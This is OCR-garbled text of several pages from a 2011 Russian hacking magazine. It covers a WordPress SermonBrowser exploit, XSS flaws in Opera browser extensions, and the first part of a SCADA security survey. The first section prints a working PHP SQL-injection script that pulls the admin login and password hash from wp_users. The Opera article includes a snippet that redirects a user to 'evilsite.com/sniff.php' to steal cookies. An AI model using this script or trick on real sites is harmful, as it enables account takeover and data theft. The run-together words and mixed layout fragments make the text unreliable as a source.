книги хакеры / журнал хакер / 150_Optimized

EXPLOIT

Эксплоитнаписаннаphp, приегозапускевкачествепараметра нужновсеголишьуказатьссылкунауязвимыйсайт, дальшескрипт всесделаетсам. Вотегокод(исключительнодляознакомления):

<?php $t=array(

"db_usr"=>"user()", "db_ver"=>"version()", "db_nam"=>"database()",

"usr_nm"=>"user_login", "passwd"=>"user_pass" );

function text2hex($string) { $hex = '';

$len = strlen($string) ;

for ($i = 0; $i < $len; $i++) {

$hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_ LEFT);

}

return $hex;

}

foreach($t as $r=>$y){ $x=@file_get_contents($argv[1].

"?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x". text2hex("<$r>").

",$y,0x".text2hex("<$r>"). "),2+from+wp_users+where+ID=1--" );

preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

XÀÊÅÐ 07 /150/ 2011

Пассивная XSS в WordPress SermonBrowser

echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed !\n";

}

?>

TARGETS

WordPress SermonBrowser Plugin <= 0.43

SOLUTION

Нужно обновить плагин до версии 0.44.1 или более поздней. z

049

ВЗЛОМ

Тарас Иващенко (http://oxdef.info)

Чтобы упростить жизнь разработчиков и сделать процесс создания расширений максимально прозрачным и удобным, создатели браузеров предлагают использовать привычные для нас веб-технологии для разработки браузерных аддонов. Это дает эффект: все новые плагины появляются как грибы после дождя. Но у такой простоты есть и обратная сторона медали — возможные риски в безопасности, которые во многом нам уже знакомы в аспекте исследования обычных веб-приложений. Браузер Opera, разработчики которого непростительно долго отказывались от системы расширений, наконец-то обзавелся таким механизмом. Справедливости ради стоит отметить, что к этому моменту в Opera уже была технология виджетов (но многие ли этими виджетами пользуются?) и система пользовательских скриптов. После найденных уязвимостей в аддонах для Chrome мне было крайне интересно пощупать расширения и для Opera. Но для этого пришлось разобраться в структуре этих самых расширений.

Аддон изнутри

Расширения в Opera очень похожи на аналогичное решение в Google Chrome. При их создании также используются популярные вебтехнологии, такие как HTML, CSS и JavaScript, а сами по себе они базируются на давно используемой при создании виджетов специфи-

кации W3C Widgets specification. Эта архитектура достаточно подробно описана в статье Криса Милса «What’s in an Opera extension?» (bit.ly/ k5WkoL). Нам же для понимания материала хватит знания некоторых основных моментов о структуре аддонов. Обычно расширение в Opera состоит из следующих частей (некоторые из них опциональные):

•фоновая страница (обычно index.html) и сопутствующие скрипты — это движок расширения;

•страница всплывающего окна, которое появляется, когда ты кликнешь на кнопке аддона в тулбаре веб-браузера;

•JavaScript-скрипты и CSS-стили для выполнения в соответствии с определенными правилами в произвольных, посещаемых тобой веб-страницах (например, скрипт, который заменяет все ссылки «mailto:» на соответствующий обработчик твоего любимого почтового сервиса);

•файл конфигурации config.xml (подобно manifest.json в Google Chrome) — в этом файле указывается мета-информация о расширении: название и описание, информация об авторе, политики безопасности и другое;

•страница настроек аддона — для того чтобы расширение могло сохранять пользовательские настройки.

Ограниченная XSS в Google Mail Notifier

Пользовательские скрипты в Opera

Технологияпользовательскихскриптов(UserJS), про которуютынавернякаужеслышалидажеприменял, позволяетпользователюподключатькпроизвольнымстраницам, которыеонпосещает, свои JavaScript-скрипты. Этискриптыбудутисполнены веб-браузеромпередзагрузкойцелевойстраницы прямовееконтексте(этооченьважно). Пользовательскиескриптымогутбытьиспользованыдля разныхцелей:

•«вырезание» надоевшей рекламы на любимом ресурсе;

•добавление произвольного HTML-кода на страницу (например, виджеты социальных сетей);

•исправление каких-либо мест (которые доставляют неудобства) на странице;

•для чего угодно в рамках текущего документа

ивозможностей JavaScript.

Дляпримераприведуследующийнебольшойскрипт, которыйвыделитнастраницевсессылки, которые ведутнадомен, отличныйоттекущего:

//==UserScript==

//@include http://example.com/*

//==/UserScript==

(function ()

{

var links = document.getElementsByTagName('a'); for(var i = 0; i<links.length; i++) {

if (links[i].href.indexOf('http://' +

document.domain) != 0) { links[i].innerText = '[->] ' +

links[i].innerText;

}

}

})();

Обративниманиенанеобязательную, новесьма полезнуюшапкускрипта, вкоторойможноуказать описаниесценария, атакженекоторыепараметры (кпримеру, длякакихдоменовегонеобходимоподключать).

ВЗЛОМ

Новейшая версия Opera

// Add every message

for(var i=0; i < event.data.msg.length; i++)

{

var tooltip = "<div class='tooltip'><p><u>" + lang.popup_to + " " + event.data.msg[i].sendermail + "</u><br/>" + lang.popup_from + " " + event.data.msg[i].authormail + "<br/><br/></p><p>" + event.data.msg[i].summary + "</p>"

var msg = $('<div></div>').addClass('message').attr( "title", tooltip).tooltip({

left: -15 })

.html("<strong>" + event.data.msg[i].authorname + "</strong> : " + event.data.msg[i].title).click(

{

link: event.data.msg[i].link }, LoadLink); $('#message_box').append(msg);

...

Явно видно, что при формировании списка писем соответствующие параметры письма используются безо всякой обработки

и вставляются прямо в HTML-код. Типичное место возможного внедрения зловредного кода в расширениях (в Opera и Google Chrome) — это страница всплывающего окна, которая обычно формируется фоновым скриптом на основе входных данных, которыми могут быть, например, RSS-потоки или информация о непрочитанных электронных письмах. ИМХО, в реальном мире при аудите безопасности расширения этими сценариями не стоит ограничиваться. Вполне вероятным может быть и небезопасное использование так полюбившегося веб-разработчикам формата JSON! Традиционно опасным считается использование в таких случаях функции исполнения JavaScript-кода, то есть eval(), например, вот так:

var msg = eval("(" + response_text + ")");

Вместо того чтобы использовать специальное API для разбора JSON-сообщений:

var msg = JSON.parse(response_text);

В таких случаях зловредная нагрузка может быть исполнена уже

вконтексте фонового скрипта, что влечет более тяжкие последствия.

Потенциальные цели

Одной из самых популярных целей для XSS-атак является похищение аутентификационных данных в виде, например, сессионных кукисов. В настоящий момент разработчики Opera не предусмотрели возможность доступа к основному хранилищу кукисов веб-браузера (как это сделано в Google Chrome), а у каждого расширения — как бы свои собственные кукисы. Но это вполне вероятно скоро может измениться под напором просьб разработчиков расширений. Следующие данные, доступные из расширения, могут быть интересны злоумышленнику при проведении им

XSS-атаки:

•собственно кукисы самого расширения, потому как в большом количестве случаев с социальными расширениями, там хранится все тот же сессионный идентификатор;

•настройки расширения, доступные через объект widget. preferences — например, там могут быть имя пользователя и пароль, как в случае расширения для работы с популярным сервисом Reddit Envelope;

•контекстная информация — в нашем примере с Google Notifier — это данные (адреса, темы и другое) писем жертвы;

•банальный «фишинг» — даже в ограниченном контексте злоумышленник может использовать рассматриваемую уязвимость для фишинг-атак (см. скрин).

Как передавать данные

Обычно, для того чтобы передать данные со стороны жертвы, злоумышленник использует так называемый снифер. К примеру, просто внедряет с помощью JavaScript картинку с адресом, включающем данные из объекта document.cookie в качестве параметров. В случае с расширением в Opera такой трюк так просто не пройдет в силу политики безопасности, о чем недвусмысленно говорит документация:

Исходя из политики по умолчанию, агент пользователя (например, веб-браузер) должен запрещать доступ к сетевым ресурсам, внешним по отношению к виджету, независимо от того,

каким образом этот доступ запрашивается — через API-функции (например, XMLHttpRequest) или через разметку документа

(например, с помощью тегов iframe, script, img).

Наше тестируемое расширение имеет следующие правила доступа к внешним ресурсам, прописанные в файле конфигурации:

...

<!-- Access Policy -->

<access origin="https://mail.google.com"/>

<access origin="https://www.google.com"/>

...

Элемент <access> дает возможность авторам расширений явным образом обозначить, с какими внешними ресурсами расширение собирается работать. Это значит, что если, например, расширению требуется даже просто показать картинку с внешнего ресурса, то необходимо это указать в этой опции! Для демонстрации в тестируемом расширении пришлось использовать логотип Google с хоста www.google.com, который подпадает под эти правила доступа. При этом есть два момента, которые стоит учитывать злоумышленнику в рамках XSS-атаки:

•автор расширения может указать звездочку (*) в качестве значения «origin» для того, чтобы его расширение имело неограниченный доступ к сетевым ресурсам;

•атрибут «subdomains» регулирует доступ для субдоменов указанного домена («привет»-блоги и прочие социальные ресурсы

спользовательскими субдоменами).

Но есть и другой трюк, который мы можем провернуть — можно сделать ссылку или другой интерактивный элемент пользовательского интерфейса с необходимым адресом. Когда жертва кликнет по ссылке и перейдет на сайт злоумышленника, последний получит

требуемые данные. Например, в следующем коде показано, как можно заменить произвольный элемент интерфейса, чтобы запутать пользователя и заполучить кукисы:

//...

var a = document.createElement('a'); var d = document.getElementById('open');

a.href = "http://evilsite.com/sniff.php?d=..."; a.id = "foo";

a.innerText = 'Open GMail Tab'; d.parentNode.replaceChild(a, d);

Взаимодействие расширений и безопасность

В противовес Google Chrome, Opera не позволяет расширениям явным образом взаимодействовать между собой. У меня было предположение, что внедряемые скрипты, будучи развитием популярной технологии пользовательских скриптов UserJS, все-таки могут взаимодействовать через общий документ, в который они внедряются:

Пользовательские JavaScript-скрипты выполняются в глобальном окружении — это означает, что все объявленное в скрипте будет доступно в рамках веб-страницы. Учитывая это,

рекомендуется помещать основной код скрипта в тело анонимной функции для того, чтобы явным образом ограничить доступность данных скрипта в рамках веб-страницы.

Но судя по всему, разработчики Opera решили подкрутить безопасность. У меня не получилось добиться того, чтобы из одного внедренного скрипта прочитать данные (значения переменных) другого, загруженного перед ним в рамках общего DOM. Ни одна попытка не оказалась удачной. Получается, что остается только одна потенциальная возможность навредить из одного расширения другому — подпортить страницу, с которой оба аддона взаимодействуют.

Outro

Расширения в Opera имеют очень похожую архитектуру, что и в Google Chrome. Более того, даже уязвимости в них встречаются практически идентичные.

В то же время, в силу изначально закрученных гаек в подсистеме безопасности, либо попросту из-за того, что что-то из критичной функциональности (доступ к кукисам браузера, истории и закладкам) не реализовано, злоумышленнику сложнее эксплуатировать найденные в расширениях Opera уязвимости. Но тут не стоит забывать, что система аддонов этого браузера еще молодая и постоянно изменяется, в том числе под напором просьб разработчиков. Так что кто знает, что и как будет устроено через некоторое время. z

Распределение SCADA с указанием степени их защищенности от несанкционированного выявления

Китай

Wonderware InTouch — 45% SCADA Axeda — 34%

Другие — 21%

Камбоджа

RTA PLS — 55% GH SCADA — 45% PSI Control — 33%

Вьетнам

Wonderware InTouch — 44% SOLON’s SCADA — 34%

SCADA Axeda — 22%

Тайланд

View Star 750 — 55% Pidpa — 45%

Индонезия

CitectSCADA — 55% Siemens Win CC — 45%

SCADA

ПОД ПРИЦЕЛОМ

АнализзащищенностиАСУТП

© Русин В. (rusin@itdefence.ru)

Степень выявления

Высокая

Умеренная

Низкая Не определена

Насколько дыра широка?

Важные инфраструктурные объекты тщательно охраняются, поэтому пройти туда или пронести на территорию что-то стороннее — крайне затруднительно. В связи с этим наибольший интерес представляет возможность удаленной атаки. На сегодняшний день каждое государство определяет для себя список наиболее важных узлов.

И хотя этот список составляет государственную тайну, абсолютно очевидно его содержание: объекты электроэнергетики, ядерной и атомной отраслей, сектор транспортировки углеводородов, нефте-

химия, стратегические военные сооружения. Естественно, многие из этих объектов подвергаются процессу автоматизации с использованием информационных технологий, что в комплексе представляет собой автоматизированную систему управления технологическими процессами (АСУ ТП). В состав типовой АСУ ТП входят три основных компонента: система диспетчеризации (SCADA), телеметрическая подсистема, инфраструктура коммуникации на базе доступных промышленных протоколов передачи данных. Зачастую

взарубежной литературе термин «АСУ ТП» опускают, говоря только

осистемах SCADA, но важно понимать, что диспетчеризация не

позволяет интерактивно управлять процессом всей системы управления.

Инструментальная

подготовка

Какой инструментарий потребуется для анализа безопасности АСУ ТП, учитывая, что дело придется иметь с системами диспетчеризации и управления технологическими процессами? Здесь придется работать на стыке известных тебе технологий и отдельных специальных решений, поскольку 60% известных АСУ ТП и систем SCADA развертывается на традиционных платформах (Windows, Linux). При необходимости используют платформы реального времени (жесткого, мягкого), такие как QNX, которые гарантируют исполнение той или иной операции с заданным интервалом времени в условиях СРВ (системы реального времени), хотя большее применение они находят в продукции военного назначения (БПЛА, бортовое управление). На сегодняшний день известно не так много узкоспециализированных программных средств анализа защищенности АСУ ТП / SCADA:

•ПК «SCADA-Аудитор» (отечественный сканер для анализа защищенности технологических сетей, АСУ ТП / SCADA);

•Teenable Nessus (содержит несколько модулей проверок систем SCADA и ряда программируемых логических контроллеров в коммерческой версии);

•Rapid7 Metasploit Project (там совсем все грустно: в

разделе «exploits/scada/» всего лишь несколько пар узкоориентированных сплоитов).

Естественно, помимо специализированного софта в ход идет и традиционный инструментарий — например,

сетевой сканер nmap. Кстати, и он следит за последними тенденциями в информационной безопасности: недавно в нем появился плагин, позволяющий выявлять на узле заражение Stuxnet’ом.

Типовые угрозы

Рассмотрим наглядно, какие угрозы влечет за собой типовая топология технологической сети. В ней выде-

ляют (в зависимости от природы технологических процессов) три зоны: корпоративную (не имеет никакого отношения к управлению, занимается исключительно бизнес-процессами), исполнительную (звено, где непосредственно выполняются технологические процессы

— например, перерабатывается аммиак или осуществляется управление движением нефти) и зону диспетчеризации (там сидят операторы АСУ ТП, которые могут повлиять на ход выполнения технологического процесса).

1.Исполнительные устройства и подсистема телеметрирования.

Очень часто электронная компонентная база используемых устройств не позволяет внедрить туда столь популярные технологии как IPSec или SSL, организовать VPN. Тем не менее, доступ к этим девайсам нужен всегда. Более того, некоторые из них выступают в качестве устройств сбора информации (телеметрии) о показателях выполнения технологического процесса с датчиков и так далее. В них же могут накапливаться сообщения о тревогах и авариях, что весьма критично. В связи с этим очень важно назначать им публично доступный IP-адрес, что, к сожалению, встречается сплошь и рядом. В некоторых ситуациях избежать этого невозможно при допущениях ошибок проектировки сети. Например, современные промышленные контроллеры могут быть соединены напрямую или через модем. При подключении через модем их часто объединяют с GPRS/GSM-модемами, что по умолчанию наделяет устройство IP-адресом мобильного оператора. При такой конфигурации они очень уязвимы для атак извне. Специализированными утилитами и методами злоумышленник может выявить подобные девайсы и натворить много плохих дел. Сами исполнительные устройства, как правило, подключаются по последовательному интерфейсу (RS-232 / RS-485) к MODBUS-серверу, а непосредственно MODBUS-сервер имеет управление по TCP/IP через канал Ethernet / Industrial Ethernet с операторами.

2.Парк АРМ-операторов и системы SCADA.

Эти товарищи находятся в самом сложном положении, поскольку вопросы режима среди них зачастую не

HTTP://WWW

links

Многиефактыпроникновенияхакеровв подобныесистемытак иостаютсязакадром. То, чтовырвалосьна публику, попадаетв специальныебазы, однаизних— RISI: securityincidents.org.

dvd

•Надискетынайдешь сканердляобнаружениязараженных Stuxnet’омузловот компанииTrend Micro.

•Кромеэтого, на

DVD доступенсканер уязвимостейTeenable Nessus, которыйреализуетрядпроверок длясистемSCADA.

ВЗЛОМ

С использованием специальных сканеров можно легко найти Slave-девайсы, работающие по протоколу MODBUS

соблюдаются. Вторая проблема — к ним часто допускают иностранных специалистов, которые могут иметь не самые благие намерения. Например, в истории червя Stuxnet на атомной станции в Бушере ключевую роль сыграл инженер-инсайдер обслуживающего подразделения, который пронес на станцию USB-носитель с вредоносным софтом. Сколько таких товарищей бродит по атомным станциям в мире — остается вопросом. Операторы имеют возможность подключаться к системе SCADA, как правило, с разным уровнем привилегий, планировать и внедрять новые проекты, изменять существующие. Несмотря на множество уязвимостей в ПО систем диспетчеризации, основной угрозой по-прежнему остается инсайдерство.

3. Корпоративная зона (BAN — Business Area Network).

В ней сидят люди, которые управляют с точки зрения бизнеса всем тем, что мы рассмотрели выше. Физически они часто находятся на значительном удалении от самого производства. В секторе энергетических или нефтетранспортирующих организаций это особенно очевидно. Все их хозяйство может находиться на различных континентах

Выявлен HMI — человеко-машинный интерфейс одной из систем диспетчеризации. Иногда такие вещи стоят на специальных промышленных компьютерах или стойках в цехах или заводах. Аптайм совсем небольшой, видимо после рестарта. Угроза проникновения на такой девайс чревата попаданием в сегмент технологической сети.

— например, в виде линий энергогенерирующих комплексов или нефтяных вышек в Ливии, а сами они могут сидеть в какой-нибудь теплой безобидной стране. По-настоящему BAN озабочена только одной задачей: извлечением прибыли, поэтому большую часть времени они посвящают изучению биллинга, финансово-экономическим вопросам своего бизнеса.